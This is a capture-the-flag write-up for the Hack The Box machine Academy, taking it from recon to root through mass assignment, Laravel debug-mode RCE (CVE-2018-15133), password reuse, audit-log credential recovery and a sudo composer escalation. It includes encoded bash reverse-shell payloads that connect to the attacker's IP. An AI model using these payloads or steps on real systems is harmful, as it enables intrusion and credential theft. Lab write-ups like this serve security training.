# Academy - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Academy was a fun easy-rated HTB machine created by [egre55](https://app.hackthebox.com/users/1190) and [mrb3n](https://app.hackthebox.com/users/2984)

We exploit a mass assignment and a Laravel debug mode vulnerability for foothold.  
For user, we abuse password reuse. We also use `aureport` to find sensitive information in logs.  
We use `composer` as a GTFObin for root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,33060 -oN academy.nmap 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.12s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open   mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
```

Besides the usual SSH (22) and HTTP (80) ports, port 33060 is also exposed.  
Since the website redirects to <http://academy.htb/>, we can update `/etc/hosts`:

```text
10.10.10.215 academy.htb
```

Visiting <http://academy.htb/> in a browser, we'd get:

![1](images/1.png)

Enumerating subdomains with `ffuf` didn't yield any results.  
I also tried enumerating routes with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://academy.htb/FUZZ -e .php -mc all -fs 273,276 2>/dev/null
images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 96ms]
index.php               [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 99ms]
admin.php               [Status: 200, Size: 2633, Words: 668, Lines: 142, Duration: 106ms]
login.php               [Status: 200, Size: 2627, Words: 667, Lines: 142, Duration: 107ms]
register.php            [Status: 200, Size: 3003, Words: 801, Lines: 149, Duration: 92ms]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 88ms]
home.php                [Status: 302, Size: 55034, Words: 4001, Lines: 1050, Duration: 89ms]
.                       [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 86ms]
```

`/admin.php` and `/home.php` redirect to `/login.php`; `/config.php` returns a blank page.  
I was able to create an account at `/register.php` and login at `/login.php`  
Even after logging in, the behavior of `/admin.php` and `/config.php` does not change.

## Mass assignment vulnerability to get `admin`

If we inspect the registration process through `burp`, we'd learn that the body in POST request is:

```text
uid=opcode&password=opcode&confirm=opcode&roleid=0
```

This is a case of mass assignment vulnerability. We can try intercepting the request in `burp` and changing `roleid` to 1.

After that, we can use those credentials at `/admin.php`.  
After logging in, we'd see a planner table. One row says:

| Item | Status |
| ---  | ---    |
| Fix issue with dev-staging-01.academy.htb | pending |

It leaks a subdomain. We can update `/etc/hosts`:

```text
10.10.10.215 academy.htb dev-staging-01.academy.htb
```

## MySQL X Protocol

Visiting <http://dev-staging-01.academy.htb/>, we'd be greeted with a Laravel error. It is running in debug mode.  
It also prints environment variables. Among them, the relevant ones are:

| Key | Value |
| --- | ---   |
| DB_CONNECTION | "mysql" |
| DB_HOST | "127.0.0.1" |
| DB_PORT | "3306" |
| DB_DATABASE | "homestead" |
| DB_USERNAME | "homestead" |
| DB_PASSWORD | "secret" |

Port 33060 was exposed. We can try using the credentials there:

```console
opcode@parrot$ mysql -h 10.10.10.215 -P 33060 --user=homestead --password=secret
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 2007 (HY000): Protocol mismatch; server version = 11, client version = 10
```

After some googling, I learnt this error happens when port 33060 is used instead of 3306.  
Googling some more, I learnt that port 33060 is the port for X Protocol.

I also found the tool needed to interact with this service: [mysqlsh](https://dev.mysql.com/doc/mysql-shell/8.0/en/mysqlsh.html)  
It can be installed with:

```console
opcode@parrot$ sudo apt-get install mysql-shell
```

And now:

```console
opcode@parrot$ mysqlsh mysqlx://homestead@10.10.10.215:33060 --password=secret 1>/dev/null
WARNING: Using a password on the command line interface can be insecure.
MySQL Error 1045: Access denied for user 'homestead'@'10.10.14.147' (using password: YES)
```

Even this one did not work.

## Laravel Debug mode RCE

I ignored the [Laravel RCE vulnerability in debug mode](https://www.ambionics.io/blog/laravel-debug-rce) because it was from 2021 and the box Academy is from 2020.  
After peeking at 0xdf's write-up, I learnt that he used [CVE-2018-15133](https://www.exploit-db.com/exploits/47129). It is an RCE due to an `unserialize` call on a potentially untrusted `X-XSRF-TOKEN` value.  
Although, I'm not sure how to deduce the version of Laravel.

Someone has already done the work and ported the exploit script to python: <https://github.com/aljavier/exploit_laravel_cve-2018-15133>  
We can grab the APP_KEY from environment variables:

```text
dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
```

```console
opcode@parrot$ git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133.git
opcode@parrot$ python3 pwn_laravel.py http://dev-staging-01.academy.htb 'dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=' -c 'id'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

To get a reverse shell, we can use the usual bash payload:

```console
opcode@parrot$ python3 pwn_laravel.py http://dev-staging-01.academy.htb 'dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=' -c 'echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash'
```

We can stabilize the shell first:

```console
www-data@academy:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@academy:/var/www$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@academy:/var/www$ export TERM=xterm-256color
www-data@academy:/var/www$ exec /bin/bash
```

## Password reuse

We can get to harvesting credentials:

```console
www-data@academy:/var/www/html$ cat academy/.env
[--SNIP--]
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
[--SNIP--]
www-data@academy:/var/www/html$ cat htb-academy-dev-01/.env
[--SNIP--]
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=homestead
DB_USERNAME=homestead
DB_PASSWORD=secret
[--SNIP--]
```

MySQL port can be accessed internally:

```console
www-data@academy:/var/www/html$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::33060                :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
```

```console
www-data@academy:/var/www/html$ mysql --user=homestead --password=secret
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'homestead'@'localhost' (using password: YES)
www-data@academy:/var/www/html$ mysql --user=dev --password='mySup3rP4s5w0rd!!'
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: YES)
```

Oddly enough, neither of them worked.  

```console
www-data@academy:/tmp$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh
```

I tested for password reuse, and it worked for `cry0l1t3`:

```console
opcode@parrot$ sshpass -p 'mySup3rP4s5w0rd!!' ssh -o StrictHostKeyChecking=no cry0l1t3@academy.htb
```

## Log summary with `aureport`

```console
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
```

`cry0l1t3` belongs to the `adm` group.  
We can look for files owned by that group:

```console
cry0l1t3@academy:~$ find / -group adm 2>/dev/null
/var/spool/rsyslog
/var/log/auth.log.3.gz
/var/log/dmesg.1.gz
/var/log/syslog.2.gz
/var/log/kern.log.3.gz
/var/log/syslog.6.gz
/var/log/syslog.1
/var/log/kern.log
/var/log/dmesg.0
/var/log/syslog
/var/log/dmesg.2.gz
/var/log/apt/term.log.2.gz
[--SNIP--]
/var/log/apache2/access.log.8.gz
/var/log/apache2/error.log.7.gz
/var/log/apache2/error.log.14.gz
/var/log/kern.log.1
```

We'd see a bunch of logs. `adm` is used for system monitoring tasks, and the canonical usage holds on this box.  
On HTB boxes with logs, I like to reset machines first.

The current goal is to analyze logs in `/var/log` to get sensitive information.  
I was unable to find a tool for this purpose. That was very unexpected.  
In his write-up, 0xdf has used [aureport](https://man7.org/linux/man-pages/man8/aureport.8.html)  
We can also try running it with the `--tty` option:

```console
cry0l1t3@academy:~$ aureport --tty

TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/20 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/20 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/20 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/20 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/20 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
[--SNIP--]
```

We have credentials here. They can be used for SSH:

```console
opcode@parrot$ sshpass -p 'mrb3n_Ac@d3my!' ssh -o StrictHostKeyChecking=no mrb3n@academy.htb
```

## Privilege escalation with composer

```console
mrb3n@academy:~$ sudo -l
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
```

We can run `composer` as any user.  
Conveniently, it has a GTFObins entry: <https://gtfobins.github.io/gtfobins/composer/>

```console
mrb3n@academy:~$ echo '{"scripts":{"opcode":"echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash"}}' > /tmp/composer.json
mrb3n@academy:~$ sudo composer --working-dir=/tmp run-script opcode
```

And we'd get a shell as root:

```console
root@academy:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
```
